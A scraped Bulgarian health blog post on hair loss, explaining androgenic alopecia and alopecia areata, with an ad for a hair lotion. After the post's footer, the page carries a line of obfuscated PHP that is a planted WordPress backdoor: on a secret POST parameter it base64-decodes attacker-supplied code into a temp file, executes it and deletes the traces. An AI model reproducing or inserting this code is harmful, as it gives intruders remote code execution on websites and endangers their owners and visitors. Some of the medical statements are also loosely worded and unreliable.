Оплешивявам ли или имам временен косопад? | Косопад

Оплешивявам ли или имам временен косопад?

Оплешивявам ли или загубата на коса е временна?

opleshivqvane-recepti

Всеки човек има определен брой космени фоликули (корени), които след 50 годишна възраст започват да намаляват дейността си. Затова, при 85% от мъжете оплешивяването настъпва в тази възраст. Този тип оплешивяване е известен като андрогенна алопеция.

Изразява се в това, че космените фоликули започват да се свиват и се нарушава естествения растеж на косата. Стават все по- малки, докато се затворят напълно и останем без косъм. Процесът на оплешивяване е доста стресиращ етап за повечето хора.

Когато косопадът ни е нормален, губим около 100 косъма на ден, но те се възстановяват. Проблемът е, когато космените корени спрат да произвеждат косъм.

„ЕФЕКТ- 2“ – ЛОСИОНЪТ СРЕЩУ ОПЛЕШИВЯВАНЕ И КОСОПАД! ВИЖ ТУК:

kosam

Косъмът е структура от клетки, които съдържат кератин. Води началото си от корена, където се намират хранителните вещества, мастните клетки и повдигащия мускул. Растежът на косъма се случва в три фази. Когато завърши цикъла си, пада, но на негово място пораства нов.

Проблемът се появява, когато спре да расте или новопоникналата коса е тънка и слаба.

Причината за оплешивяването основно е хормонът тестостерон. В комбинация с андрогена дехидротестостерон кара косъма да отслабне, нарушава растежа и пада. Мъжете, които произвеждат повече тестостерон са изложени на по- висок риск от оплешивяване. При жените този процес се появява след менопауза, когато нивата на естрогена намаляват за сметка за тестостерона.

Ако косопадът се изявява в малки зони, като брада, вежди, мигли и пр, говорим за алопеция реата. Това е временна загуба на окосмението. Може да се дължи на тежсо заболяване или неправилно хранене. Също и при сериозно увреждане на косата.

10. февруари 2015 15:01:26 от Надя Колева
Категории: Косопад – Статии | Етикети: , , , | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}